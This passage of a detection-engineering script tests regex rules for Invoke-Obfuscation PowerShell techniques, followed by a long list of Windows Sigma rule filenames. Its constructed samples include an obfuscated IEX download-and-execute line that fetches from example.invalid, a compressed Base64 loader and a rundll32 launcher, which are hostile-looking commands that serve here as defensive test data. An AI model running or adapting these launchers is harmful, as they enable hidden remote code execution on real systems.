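    "Invoke-Obfuscation Obfuscated IEX Invocation": [
        r'\$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[',
        r'\$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[',
        r'\$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[',
        r'\$env:ComSpec\[(\s*\d{1,3}\s*,){2}',
        r'\$VerbosePreference\.ToString\(',
    ],
    "Invoke-Obfuscation COMPRESS OBFUSCATION": [
        r'(?i).*new-object.*(?:system\.io\.compression\.deflatestream|system\.io\.streamreader).*text\.encoding\]::ascii.*readtoend',
    ],
    "Invoke-Obfuscation RUNDLL LAUNCHER": [
        r'(?i).*rundll32(?:\.exe)?(?:\s+)?shell32\.dll.*shellexec_rundll.*powershell.*\"',
    ],
    "Invoke-Obfuscation Via Use Rundll32": [
        r'(?i).*&&.*rundll32.*shell32\.dll.*shellexec_rundll.*(value|invoke|comspec|iex).*"',
    ],
}

# Constructed Event ID 4104 ScriptBlockText values (not real telemetry). The obfuscated
# ones follow the shapes the rules describe: 'iex' rebuilt from characters of $PSHome or
# $env:ComSpec, a DeflateStream payload, and a rundll32 ShellExec_RunDLL launcher.
SAMPLES = {
    "benign": "Get-ChildItem -Path $PSHome | Select-Object Name",
    "iex_pshome": ".($PSHome[4]+$PSHome[30]+'x')(New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    # Same launcher with randomized casing, which Invoke-Obfuscation applies to such tokens.
    "iex_pshome_randomcase": ".($pSHoMe[4]+$PShOmE[30]+'x')(New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    "iex_comspec": "&($env:ComSpec[4,15,25]-Join'')('calc')",
    "compress": "IEX (New-Object IO.StreamReader((New-Object System.IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('AAAA'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()",
    "rundll": 'cmd /c "set v=iex (gc s.txt)&&rundll32.exe shell32.dll,ShellExec_RunDLL "powershell" "-nop" "-c" "iex $env:v""',
}


def evaluate(script_block_text: str, ignore_case: bool = False) -> list:
    """Return the sorted titles of the rules whose selection matches the script block.
    Sigma's |re is a search, not a full match, so re.search is the right primitive.
    ignore_case emulates a backend that matches regexes case-insensitively; patterns
    that already start with (?i) are unaffected by the flag."""
    flags = re.IGNORECASE if ignore_case else 0
    fired = []
    for title, patterns in RULES.items():
        if any(re.search(p, script_block_text, flags) for p in patterns):
            fired.append(title)
    return sorted(fired)


def triage(samples: dict, ignore_case: bool = False) -> dict:
    """Run every sample through every rule; useful for regression-testing a rule edit."""
    return {name: evaluate(text, ignore_case) for name, text in samples.items()}


if __name__ == "__main__":
    for mode in (False, True):
        print("ignore_case =", mode)
        for name, hits in triage(SAMPLES, mode).items():
            print(f"  {name:24s} {hits}")
```

The `iex_pshome_randomcase` sample is the caveat to carry away: the five IEX patterns carry no `(?i)`, unlike the COMPRESS and rundll patterns, so whether they catch randomized casing is decided by the backend's regex semantics rather than by the rule. If the target SIEM matches regexes case-sensitively, prefix those patterns with `(?i)` or the rule only sees the canonical spelling. The `rundll` sample also shows that the two rundll32 rules overlap; an alert from both on one script block is one finding, not two.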

process_access

proc_access_win_cmstp_execution_by_access.yml
proc_access_win_cobaltstrike_bof_injection_pattern.yml
proc_access_win_cred_dump_lsass_access.yml
proc_access_win_direct_syscall_ntopenprocess.yml
proc_access_win_in_memory_assembly_execution.yml
proc_access_win_invoke_phantom.yml
proc_access_win_lazagne_cred_dump_lsass_access.yml
proc_access_win_littlecorporal_generated_maldoc.yml
proc_access_win_load_undocumented_autoelevated_com_interface.yml
proc_access_win_lsass_dump_comsvcs_dll.yml
proc_access_win_lsass_memdump.yml
proc_access_win_lsass_memdump_evasion.yml
proc_access_win_lsass_memdump_indicators.yml
proc_access_win_malware_verclsid_shellcode.yml
proc_access_win_mimikatz_trough_winrm.yml
proc_access_win_pypykatz_cred_dump_lsass_access.yml
proc_access_win_susp_proc_access_lsass.yml
proc_access_win_susp_proc_access_lsass_susp_source.yml
proc_access_win_svchost_cred_dump.yml
proc_access_win_uac_bypass_wow64_logger.yml

process_creation

proc_creation_win_abusing_debug_privilege.yml
proc_creation_win_abusing_windows_telemetry_for_persistence.yml
proc_creation_win_accesschk_usage_after_priv_escalation.yml
proc_creation_win_ad_find_discovery.yml
proc_creation_win_advanced_ip_scanner.yml
proc_creation_win_advanced_port_scanner.yml
proc_creation_win_alternate_data_streams.yml
proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml
proc_creation_win_always_install_elevated_windows_installer.yml
proc_creation_win_anydesk.yml
proc_creation_win_anydesk_silent_install.yml
proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml
proc_creation_win_attrib_hiding_files.yml
proc_creation_win_attrib_system.yml
proc_creation_win_automated_collection.yml
proc_creation_win_bad_opsec_sacrificial_processes.yml
proc_creation_win_base64_listing_shadowcopy.yml
proc_creation_win_base64_reflective_assembly_load.yml
proc_creation_win_bitsadmin_download.yml
proc_creation_win_bootconf_mod.yml
proc_creation_win_bypass_squiblytwo.yml
proc_creation_win_c3_load_by_rundll32.yml
proc_creation_win_certoc_execution.yml
proc_creation_win_change_default_file_association.yml
proc_creation_win_cl_invocation_lolscript.yml
proc_creation_win_cl_mutexverifiers_lolscript.yml
proc_creation_win_class_exec_xwizard.yml
proc_creation_win_cleanwipe.yml
proc_creation_win_clip.yml
proc_creation_win_cmd_delete.yml
proc_creation_win_cmd_dosfuscation.yml
proc_creation_win_cmd_redirect.yml
proc_creation_win_cmdkey_recon.yml
proc_creation_win_cmstp_com_object_access.yml
proc_creation_win_cmstp_execution_by_creation.yml
proc_creation_win_cobaltstrike_load_by_rundll32.yml
proc_creation_win_cobaltstrike_process_patterns.yml
proc_creation_win_commandline_path_traversal.yml
proc_creation_win_commandline_path_traversal_evasion.yml
proc_creation_win_conti_cmd_ransomware.yml
proc_creation_win_control_panel_item.yml
proc_creation_win_copying_sensitive_files_with_credential_data.yml
proc_creation_win_coti_sqlcmd.yml
proc_creation_win_creation_mavinject_dll.yml
proc_creation_win_credential_access_via_password_filter.yml
proc_creation_win_crime_fireball.yml
proc_creation_win_crime_maze_ransomware.yml
proc_creation_win_crime_snatch_ransomware.yml
proc_creation_win_crypto_mining_monero.yml
proc_creation_win_cve_2021_26857_msexchange.yml
proc_creation_win_data_compressed_with_rar.yml
proc_creation_win_delete_systemstatebackup.yml
proc_creation_win_detecting_fake_instances_of_hxtsr.yml
proc_creation_win_dinjector.yml
proc_creation_win_discover_private_keys.yml
proc_creation_win_dll_sideload_xwizard.yml
proc_creation_win_dns_exfiltration_tools_execution.yml
proc_creation_win_dns_serverlevelplugindll.yml
proc_creation_win_dnscat2_powershell_implementation.yml
proc_creation_win_dotnet.yml
proc_creation_win_dsim_remove.yml
proc_creation_win_dumpstack_log_evasion.yml
proc_creation_win_embed_exe_lnk.yml
proc_creation_win_encoded_frombase64string.yml
proc_creation_win_encoded_iex.yml
proc_creation_win_enumeration_for_credentials_in_registry.yml
proc_creation_win_esentutl_webcache.yml
proc_creation_win_etw_modification_cmdline.yml
proc_creation_win_etw_trace_evasion.yml
proc_creation_win_evil_winrm.yml
proc_creation_win_exfiltration_and_tunneling_tools_execution.yml
proc_creation_win_expand_cabinet_files.yml
proc_creation_win_exploit_cve_2015_1641.yml
proc_creation_win_exploit_cve_2017_0261.yml
proc_creation_win_exploit_cve_2017_11882.yml
proc_creation_win_exploit_cve_2017_8759.yml
proc_creation_win_exploit_cve_2019_1378.yml
proc_creation_win_exploit_cve_2019_1388.yml
proc_creation_win_exploit_cve_2020_10189.yml
proc_creation_win_exploit_cve_2020_1048.yml
proc_creation_win_exploit_cve_2020_1350.yml
proc_creation_win_exploit_lpe_cve_2021_41379.yml
proc_creation_win_exploit_systemnightmare.yml
proc_creation_win_false_sysinternalsuite.yml
proc_creation_win_file_permission_modifications.yml
proc_creation_win_findstr_gpp_passwords.yml
proc_creation_win_fsutil_symlinkevaluation.yml
proc_creation_win_gotoopener.yml
proc_creation_win_grabbing_sensitive_hives_via_reg.yml
proc_creation_win_hack_adcspwn.yml
proc_creation_win_hack_bloodhound.yml
proc_creation_win_hack_dumpert.yml
proc_creation_win_hack_hydra.yml
proc_creation_win_hack_koadic.yml
proc_creation_win_hack_rubeus.yml
proc_creation_win_hack_secutyxploded.yml
proc_creation_win_hack_wce.yml
proc_creation_win_hashcat.yml
proc_creation_win_headless_browser_file_download.yml
proc_creation_win_hh_chm.yml
proc_creation_win_hiding_malware_in_fonts_folder.yml
proc_creation_win_high_integrity_sdclt.yml
proc_creation_win_hktl_createminidump.yml
proc_creation_win_hktl_uacme_uac_bypass.yml
proc_creation_win_html_help_spawn.yml
proc_creation_win_hwp_exploits.yml
proc_creation_win_iis_http_logging.yml
proc_creation_win_impacket_compiled_tools.yml
proc_creation_win_impacket_lateralization.yml
proc_creation_win_indirect_cmd.yml
proc_creation_win_indirect_cmd_compatibility_assistant.yml
proc_creation_win_infdefaultinstall.yml
proc_creation_win_install_reg_debugger_backdoor.yml
proc_creation_win_interactive_at.yml
proc_creation_win_invoke_obfuscation_clip.yml
proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml
proc_creation_win_invoke_obfuscation_stdin.yml
proc_creation_win_invoke_obfuscation_var.yml
proc_creation_win_invoke_obfuscation_via_compress.yml
proc_creation_win_invoke_obfuscation_via_rundll.yml
proc_creation_win_invoke_obfuscation_via_stdin.yml
proc_creation_win_invoke_obfuscation_via_use_clip.yml
proc_creation_win_invoke_obfuscation_via_use_mhsta.yml
proc_creation_win_invoke_obfuscation_via_use_rundll32.yml
proc_creation_win_invoke_obfuscation_via_var.yml
proc_creation_win_lethalhta.yml
proc_creation_win_lobas_aspnet_compiler.yml
proc_creation_win_lobas_bash.yml
proc_creation_win_local_system_owner_account_discovery.yml
proc_creation_win_logmein.yml
proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml
proc_creation_win_lolbas_configsecuritypolicy.yml
proc_creation_win_lolbas_data_exfiltration_by_using_datasvcutil.yml
proc_creation_win_lolbas_diantz_ads.yml
proc_creation_win_lolbas_diantz_remote_cab.yml
proc_creation_win_lolbas_execution_of_wuauclt.yml
proc_creation_win_lolbas_extexport.yml
proc_creation_win_lolbas_extrac32.yml
proc_creation_win_lolbas_extrac32_ads.yml
proc_creation_win_lolbin_cscript_gathernetworkinfo.yml
proc_creation_win_lolbin_execution_via_winget.yml
proc_creation_win_lolbin_wlrmdr.yml
proc_creation_win_lolbins_by_office_applications.yml
proc_creation_win_lolbins_suspicious_driver_installed_by_pnputil.yml
proc_creation_win_lolbins_with_wmiprvse_parent_process.yml
proc_creation_win_long_powershell_commandline.yml
proc_creation_win_lsass_dump.yml
proc_creation_win_mailboxexport_share.yml
proc_creation_win_mal_adwind.yml
proc_creation_win_mal_blue_mockingbird.yml
proc_creation_win_mal_darkside_ransomware.yml
proc_creation_win_mal_hermetic_wiper_activity.yml
proc_creation_win_mal_lockergoga_ransomware.yml
proc_creation_win_mal_ryuk.yml
proc_creation_win_malware_conti.yml
proc_creation_win_malware_conti_7zip.yml
proc_creation_win_malware_conti_shadowcopy.yml
proc_creation_win_malware_dridex.yml
proc_creation_win_malware_dtrack.yml
proc_creation_win_malware_emotet.yml
proc_creation_win_malware_formbook.yml
proc_creation_win_malware_notpetya.yml
proc_creation_win_malware_qbot.yml
proc_creation_win_malware_ryuk.yml
proc_creation_win_malware_script_dropper.yml
proc_creation_win_malware_trickbot_recon_activity.yml
proc_creation_win_malware_trickbot_wermgr.yml
proc_creation_win_malware_wannacry.yml
proc_creation_win_manage_bde_lolbas.yml
proc_creation_win_mavinject_proc_inj.yml
proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml
proc_creation_win_mimikatz_command_line.yml
proc_creation_win_mmc20_lateral_movement.yml
proc_creation_win_mmc_spawn_shell.yml
proc_creation_win_modif_of_services_for_via_commandline.yml
proc_creation_win_monitoring_for_persistence_via_bits.yml
proc_creation_win_mouse_lock.yml
proc_creation_win_msdeploy.yml
proc_creation_win_msedge_minimized_download.yml
proc_creation_win_mshta_javascript.yml
proc_creation_win_mshta_spawn_shell.yml
proc_creation_win_msiexec_execute_dll.yml
proc_creation_win_msiexec_install_quiet.yml
proc_creation_win_mstsc.yml
proc_creation_win_multiple_suspicious_cli.yml
proc_creation_win_net_enum.yml
proc_creation_win_net_use_admin_share.yml
proc_creation_win_net_user_add.yml
proc_creation_win_netcat_execution.yml
proc_creation_win_netsh_allow_port_rdp.yml
proc_creation_win_netsh_fw_add.yml
proc_creation_win_netsh_fw_add_susp_image.yml
proc_creation_win_netsh_fw_enable_group_rule.yml
proc_creation_win_netsh_packet_capture.yml
proc_creation_win_netsh_port_fwd.yml
proc_creation_win_netsh_port_fwd_3389.yml
proc_creation_win_netsh_wifi_credential_harvesting.yml
proc_creation_win_network_sniffing.yml
proc_creation_win_new_service_creation.yml
proc_creation_win_nltest_recon.yml
proc_creation_win_non_interactive_powershell.yml
proc_creation_win_non_priv_reg_or_ps.yml
proc_creation_win_office_applications_spawning_wmi_commandline.yml
proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml
proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml
proc_creation_win_office_shell.yml
proc_creation_win_office_spawn_exe_from_users_directory.yml
proc_creation_win_office_spawning_wmi_commandline.yml
proc_creation_win_outlook_shell.yml
proc_creation_win_pingback_backdoor.yml
proc_creation_win_plugx_susp_exe_locations.yml
proc_creation_win_possible_applocker_bypass.yml
proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml
proc_creation_win_powershell_amsi_bypass.yml
proc_creation_win_powershell_audio_capture.yml
proc_creation_win_powershell_b64_shellcode.yml
proc_creation_win_powershell_bitsjob.yml
proc_creation_win_powershell_cmdline_reversed_strings.yml
proc_creation_win_powershell_cmdline_special_characters.yml
proc_creation_win_powershell_cmdline_specific_comb_methods.yml
proc_creation_win_powershell_defender_disable_feature.yml
proc_creation_win_powershell_defender_exclusion.yml
proc_creation_win_powershell_disable_windef_av.yml
proc_creation_win_powershell_dll_execution.yml
proc_creation_win_powershell_downgrade_attack.yml
proc_creation_win_powershell_download.yml
proc_creation_win_powershell_download_patterns.yml
proc_creation_win_powershell_frombase64string.yml
proc_creation_win_powershell_reverse_shell_connection.yml
proc_creation_win_powershell_suspicious_parameter_variation.yml
proc_creation_win_powershell_xor_commandline.yml
proc_creation_win_powersploit_empire_schtasks.yml
proc_creation_win_proc_dump_createdump.yml
proc_creation_win_proc_dump_rdrleakdiag.yml
proc_creation_win_proc_wrong_parent.yml
proc_creation_win_procdump.yml
proc_creation_win_procdump_evasion.yml
proc_creation_win_process_dump_rdrleakdiag.yml
proc_creation_win_process_dump_rundll32_comsvcs.yml
proc_creation_win_protocolhandler_suspicious_file.yml
proc_creation_win_proxy_execution_wuauclt.yml
proc_creation_win_psexesvc_start.yml
proc_creation_win_public_folder_parent.yml
proc_creation_win_purplesharp_indicators.yml
proc_creation_win_pypykatz.yml
proc_creation_win_query_registry.yml
proc_creation_win_ransom_blackbyte.yml
proc_creation_win_rasautou_dll_execution.yml
proc_creation_win_rdp_hijack_shadowing.yml
proc_creation_win_redirect_to_stream.yml
proc_creation_win_redmimicry_winnti_proc.yml
proc_creation_win_reg_add_run_key.yml
proc_creation_win_reg_defender_exclusion.yml
proc_creation_win_reg_dump_sam.yml
proc_creation_win_reg_service_imagepath_change.yml
proc_creation_win_regedit_export_critical_keys.yml
proc_creation_win_regedit_export_keys.yml
proc_creation_win_regedit_import_keys.yml
proc_creation_win_regedit_import_keys_ads.yml
proc_creation_win_regini.yml
proc_creation_win_regini_ads.yml
proc_creation_win_remote_powershell_session_process.yml
proc_creation_win_remote_time_discovery.yml
proc_creation_win_remove_windows_defender_definition_files.yml
proc_creation_win_renamed_binary.yml
proc_creation_win_renamed_binary_highly_relevant.yml
proc_creation_win_renamed_jusched.yml
proc_creation_win_renamed_megasync.yml
proc_creation_win_renamed_paexec.yml
proc_creation_win_renamed_powershell.yml
proc_creation_win_renamed_procdump.yml
proc_creation_win_renamed_psexec.yml
proc_creation_win_renamed_whoami.yml
proc_creation_win_root_certificate_installed.yml
proc_creation_win_run_executable_invalid_extension.yml
proc_creation_win_run_from_zip.yml
proc_creation_win_run_powershell_script_from_ads.yml
proc_creation_win_run_powershell_script_from_input_stream.yml
proc_creation_win_run_virtualbox.yml
proc_creation_win_rundll32_not_from_c_drive.yml
proc_creation_win_rundll32_registered_com_objects.yml
proc_creation_win_rundll32_without_parameters.yml
proc_creation_win_screenconnect.yml
proc_creation_win_screenconnect_anomaly.yml
proc_creation_win_script_event_consumer_spawn.yml
proc_creation_win_sdbinst_shim_persistence.yml
proc_creation_win_sdclt_child_process.yml
proc_creation_win_sdelete.yml
proc_creation_win_service_execution.yml
proc_creation_win_service_stop.yml
proc_creation_win_set_policies_to_unsecure_level.yml
proc_creation_win_shadow_copies_access_symlink.yml
proc_creation_win_shadow_copies_creation.yml
proc_creation_win_shadow_copies_deletion.yml
proc_creation_win_shell_spawn_by_java.yml
proc_creation_win_shell_spawn_mshta.yml
proc_creation_win_shell_spawn_susp_program.yml
proc_creation_win_silenttrinity_stage_use.yml
proc_creation_win_software_discovery.yml
proc_creation_win_soundrec_audio_capture.yml
proc_creation_win_spn_enum.yml
proc_creation_win_sqlcmd_veeam_dump.yml
proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml
proc_creation_win_stickykey_like_backdoor.yml
proc_creation_win_stordiag_execution.yml
proc_creation_win_sus_auditpol_usage.yml
proc_creation_win_susp_7z.yml
proc_creation_win_susp_acccheckconsole.yml
proc_creation_win_susp_add_user_remote_desktop.yml
proc_creation_win_susp_adfind.yml
proc_creation_win_susp_adfind_enumerate.yml
proc_creation_win_susp_adidnsdump.yml
proc_creation_win_susp_advancedrun.yml
proc_creation_win_susp_advancedrun_priv_user.yml
proc_creation_win_susp_atbroker.yml
proc_creation_win_susp_athremotefxvgpudisablementcommand.yml
proc_creation_win_susp_bcdedit.yml
proc_creation_win_susp_bginfo.yml
proc_creation_win_susp_bitstransfer.yml
proc_creation_win_susp_calc.yml
proc_creation_win_susp_cdb.yml
proc_creation_win_susp_certreq_download.yml
proc_creation_win_susp_certutil_command.yml
proc_creation_win_susp_certutil_encode.yml
proc_creation_win_susp_char_in_cmd.yml
proccreation_win_susp_child_process_as_system.yml
proc_creation_win_susp_cipher.yml
proc_creation_win_susp_cli_escape.yml
proc_creation_win_susp_cmd_http_appdata.yml
proc_creation_win_susp_cmd_shadowcopy_access.yml
proc_creation_win_susp_cmdl32_lolbas.yml
proc_creation_win_susp_codepage_switch.yml
proc_creation_win_susp_commands_recon_activity.yml
proc_creation_win_susp_compression_params.yml
proc_creation_win_susp_comsvcs_procdump.yml
proc_creation_win_susp_conhost.yml
proc_creation_win_susp_control_cve_2021_40444.yml
proc_creation_win_susp_control_dll_load.yml
proc_creation_win_susp_copy_lateral_movement.yml
proc_creation_win_susp_copy_system32.yml
proc_creation_win_susp_covenant.yml
proc_creation_win_susp_crackmapexec_execution.yml
proc_creation_win_susp_crackmapexec_flags.yml
proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml
proc_creation_win_susp_csc.yml
proc_creation_win_susp_csc_folder.yml
proc_creation_win_susp_cscript_vbs.yml
proc_creation_win_susp_csi.yml
proc_creation_win_susp_curl_download.yml
proc_creation_win_susp_curl_fileupload.yml
proc_creation_win_susp_curl_start_combo.yml
proc_creation_win_susp_curl_useragent.yml
proc_creation_win_susp_dctask64_proc_inject.yml
proc_creation_win_susp_del.yml
proc_creation_win_susp_desktopimgdownldr.yml
proc_creation_win_susp_devinit_lolbin.yml
proc_creation_win_susp_devtoolslauncher.yml
proc_creation_win_susp_dir.yml
proc_creation_win_susp_direct_asep_reg_keys_modification.yml
proc_creation_win_susp_disable_eventlog.yml
proc_creation_win_susp_disable_ie_features.yml
proc_creation_win_susp_disable_raccine.yml
proc_creation_win_susp_diskshadow.yml
proc_creation_win_susp_ditsnap.yml
proc_creation_win_susp_dnx.yml
proc_creation_win_susp_double_extension.yml
proc_creation_win_susp_download_office_domain.yml
proc_creation_win_susp_dtrace_kernel_dump.yml
proc_creation_win_susp_dxcap.yml
proc_creation_win_susp_emotet_rundll32_execution.yml
proc_creation_win_susp_esentutl_params.yml
proc_creation_win_susp_eventlog_clear.yml
proc_creation_win_susp_execution_path.yml
proc_creation_win_susp_execution_path_webserver.yml
proc_creation_win_susp_explorer.yml
proc_creation_win_susp_explorer_break_proctree.yml
proc_creation_win_susp_explorer_nouaccheck.yml
proc_creation_win_susp_file_characteristics.yml
proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml
proc_creation_win_susp_findstr.yml
proc_creation_win_susp_findstr_385201.yml
proc_creation_win_susp_findstr_lnk.yml
proc_creation_win_susp_finger_usage.yml
proc_creation_win_susp_firewall_disable.yml
proc_creation_win_susp_format.yml
proc_creation_win_susp_fsutil_usage.yml
proc_creation_win_susp_ftp.yml
proc_creation_win_susp_gup.yml
proc_creation_win_susp_hostname.yml
proc_creation_win_susp_image_missing.yml
proc_creation_win_susp_instalutil.yml
proc_creation_win_susp_iss_module_install.yml
proc_creation_win_susp_lsass_clone.yml
proc_creation_win_susp_machineguid.yml
proc_creation_win_susp_mounted_share_deletion.yml
proc_creation_win_susp_mpcmdrun_download.yml
proc_creation_win_susp_mpiexec_lolbin.yml
proc_creation_win_susp_mshta_execution.yml
proc_creation_win_susp_mshta_pattern.yml
proc_creation_win_susp_msiexec_cwd.yml
proc_creation_win_susp_msiexec_web_install.yml
proc_creation_win_susp_msoffice.yml
proc_creation_win_susp_net_execution.yml
proc_creation_win_susp_net_use_password_plaintext.yml
proc_creation_win_susp_netsh_command.yml
proc_creation_win_susp_netsh_dll_persistence.yml
proc_creation_win_susp_network_command.yml
proc_creation_win_susp_network_listing_connections.yml
proc_creation_win_susp_ngrok_pua.yml
proc_creation_win_susp_nmap.yml
proc_creation_win_susp_non_exe_image.yml
proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml
proc_creation_win_susp_ntdsutil.yml
proc_creation_win_susp_odbcconf.yml
proc_creation_win_susp_openwith.yml
proc_creation_win_susp_outlook.yml
proc_creation_win_susp_outlook_temp.yml
proc_creation_win_susp_pcwutl.yml
proc_creation_win_susp_pester.yml
proc_creation_win_susp_ping_hex_ip.yml
proc_creation_win_susp_plink_remote_forward.yml
proc_creation_win_susp_powershell_empire_launch.yml
proc_creation_win_susp_powershell_empire_uac_bypass.yml
proc_creation_win_susp_powershell_enc_cmd.yml
proc_creation_win_susp_powershell_encode.yml
proc_creation_win_susp_powershell_encoded_param.yml
proc_creation_win_susp_powershell_getprocess_lsass.yml
proc_creation_win_susp_powershell_hidden_b64_cmd.yml
proc_creation_win_susp_powershell_parent_combo.yml
proc_creation_win_susp_powershell_parent_process.yml
proc_creation_win_susp_powershell_sam_access.yml
proc_creation_win_susp_pressynkey_lolbin.yml
proc_creation_win_susp_print.yml
proc_creation_win_susp_procdump.yml
proc_creation_win_susp_procdump_lsass.yml
proc_creation_win_susp_progname.yml
proc_creation_win_susp_ps_appdata.yml
proc_creation_win_susp_ps_downloadfile.yml
proc_creation_win_susp_psexec_eula.yml
proc_creation_win_susp_psexex_paexec_escalate_system.yml
proc_creation_win_susp_psexex_paexec_flags.yml
proc_creation_win_susp_psloglist.yml
proc_creation_win_susp_psr_capture_screenshots.yml
proc_creation_win_susp_radmin.yml
proc_creation_win_susp_rar_flags.yml
proc_creation_win_susp_rasdial_activity.yml
proc_creation_win_susp_razorinstaller_explorer.yml
proc_creation_win_susp_rclone_execution.yml
proc_creation_win_susp_recon.yml
proc_creation_win_susp_recon_activity.yml
proc_creation_win_susp_recon_net_activity.yml
proc_creation_win_susp_redir_local_admin_share.yml
proc_creation_win_susp_reg_bitlocker.yml
proc_creation_win_susp_reg_disable_sec_services.yml
proc_creation_win_susp_reg_open_command.yml
proc_creation_win_susp_regedit_trustedinstaller.yml
proc_creation_win_susp_register_cimprovider.yml
proc_creation_win_susp_registration_via_cscript.yml
proc_creation_win_susp_regsvr32_anomalies.yml
proc_creation_win_susp_regsvr32_flags_anomaly.yml
proc_creation_win_susp_regsvr32_http_pattern.yml
proc_creation_win_susp_regsvr32_image.yml
proc_creation_win_susp_regsvr32_no_dll.yml
proc_creation_win_susp_renamed_dctask64.yml
proc_creation_win_susp_renamed_debugview.yml
proc_creation_win_susp_renamed_paexec.yml
proc_creation_win_susp_rpcping.yml
proc_creation_win_susp_run_folder.yml
proc_creation_win_susp_run_locations.yml
proc_creation_win_susp_rundll32_activity.yml
proc_creation_win_susp_rundll32_by_ordinal.yml
proc_creation_win_susp_rundll32_inline_vbs.yml
proc_creation_win_susp_rundll32_js_runhtmlapplication.yml
proc_creation_win_susp_rundll32_no_params.yml
proc_creation_win_susp_rundll32_script_run.yml
proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml
proc_creation_win_susp_rundll32_sys.yml
proc_creation_win_susp_runonce_execution.yml
proc_creation_win_susp_runscripthelper.yml
proc_creation_win_susp_sc_query.yml
proc_creation_win_susp_schtask_creation.yml
proc_creation_win_susp_schtask_creation_temp_folder.yml
proc_creation_win_susp_schtasks_disable.yml
proc_creation_win_susp_schtasks_env_folder.yml
proc_creation_win_susp_schtasks_parent.yml
proc_creation_win_susp_schtasks_pattern.yml
proc_creation_win_susp_schtasks_user_temp.yml
proc_creation_win_susp_screenconnect_access.yml
proc_creation_win_susp_screensaver_reg.yml
proc_creation_win_susp_script_exec_from_env_folder.yml
proc_creation_win_susp_script_exec_from_temp.yml
proc_creation_win_susp_script_execution.yml
proc_creation_win_susp_service_dacl_modification.yml
proc_creation_win_susp_service_dir.yml
proc_creation_win_susp_service_modification.yml
proc_creation_win_susp_service_path_modification.yml
proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml
proc_creation_win_susp_servu_process_pattern.yml
proc_creation_win_susp_sharpview.yml
proc_creation_win_susp_shell_spawn_by_java.yml
proc_creation_win_susp_shell_spawn_by_java_keytool.yml
proc_creation_win_susp_shell_spawn_from_mssql.yml
proc_creation_win_susp_shell_spawn_from_winrm.yml
proc_creation_win_susp_shimcache_flush.yml
proc_creation_win_susp_shutdown.yml
proc_creation_win_susp_splwow64.yml
proc_creation_win_susp_spoolsv_child_processes.yml
proc_creation_win_susp_sqldumper_activity.yml
proc_creation_win_susp_squirrel_lolbin.yml
proc_creation_win_susp_svchost.yml
proc_creation_win_susp_svchost_no_cli.yml
proc_creation_win_susp_sysprep_appdata.yml
proc_creation_win_susp_system_user_anomaly.yml
proc_creation_win_susp_systeminfo.yml
proc_creation_win_susp_sysvol_access.yml
proc_creation_win_susp_takeown.yml
proc_creation_win_susp_target_location_shell32.yml
proc_creation_win_susp_taskkill.yml
proc_creation_win_susp_tasklist_command.yml
proc_creation_win_susp_taskmgr_localsystem.yml
proc_creation_win_susp_taskmgr_parent.yml
proc_creation_win_susp_tracker_execution.yml
proc_creation_win_susp_trolleyexpress_procdump.yml
proc_creation_win_susp_tscon_localsystem.yml
proc_creation_win_susp_tscon_rdp_redirect.yml
proc_creation_win_susp_uac_bypass_trustedpath.yml
proc_creation_win_susp_use_of_csharp_console.yml
proc_creation_win_susp_use_of_sqlps_bin.yml
proc_creation_win_susp_use_of_sqltoolsps_bin.yml
proc_creation_win_susp_use_of_te_bin.yml
proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
proc_creation_win_susp_userinit_child.yml
proc_creation_win_susp_vboxdrvinst.yml
proc_creation_win_susp_vbscript_unc2452.yml
proc_creation_win_susp_volsnap_disable.yml
proc_creation_win_susp_web_request_cmd.yml
proc_creation_win_susp_webdav_client_execution.yml
proc_creation_win_susp_where_execution.yml
proc_creation_win_susp_whoami.yml
proc_creation_win_susp_whoami_anomaly.yml
proc_creation_win_susp_whoami_as_param.yml
proc_creation_win_susp_winrar_dmp.yml
proc_creation_win_susp_winrar_execution.yml
proc_creation_win_susp_winrm_awl_bypass.yml
proc_creation_win_susp_winrm_execution.yml
proc_creation_win_susp_winzip.yml
proc_creation_win_susp_wmi_execution.yml
proc_creation_win_susp_wmic_eventconsumer_create.yml
proc_creation_win_susp_wmic_proc_create_rundll32.yml
proc_creation_win_susp_wmic_security_product_uninstall.yml
proc_creation_win_susp_workfolders.yml
proc_creation_win_susp_wsl_lolbin.yml
proc_creation_win_susp_wuauclt.yml
proc_creation_win_susp_wuauclt_cmdline.yml
proc_creation_win_susp_zip_compress.yml
proc_creation_win_susp_zipexec.yml
proc_creation_win_suspicious_ad_reco.yml
proc_creation_win_syncappvpublishingserver_execute_powershell.yml
proc_creation_win_syncappvpublishingserver_vbs_execute_powershell.yml
proc_creation_win_sysinternals_eula_accepted.yml
proc_creation_win_sysmon_driver_unload.yml
proc_creation_win_sysmon_uac_bypass_eventvwr.yml
proc_creation_win_system_exe_anomaly.yml
proc_creation_win_tap_installer_execution.yml
proc_creation_win_task_folder_evasion.yml
proc_creation_win_termserv_proc_spawn.yml
proc_creation_win_tool_nircmd.yml
proc_creation_win_tool_nircmd_as_system.yml
proc_creation_win_tool_nsudo_as_system.yml
proc_creation_win_tool_psexec.yml
proc_creation_win_tool_runx_as_system.yml
proc_creation_win_tools_relay_attacks.yml
proc_creation_win_tor_browser.yml
proc_creation_win_trust_discovery.yml
proc_creation_win_tttracer_mod_load.yml
proc_creation_win_uac_bypass_changepk_slui.yml
proc_creation_win_uac_bypass_cleanmgr.yml
proc_creation_win_uac_bypass_computerdefaults.yml
proc_creation_win_uac_bypass_consent_comctl32.yml
proc_creation_win_uac_bypass_dismhost.yml
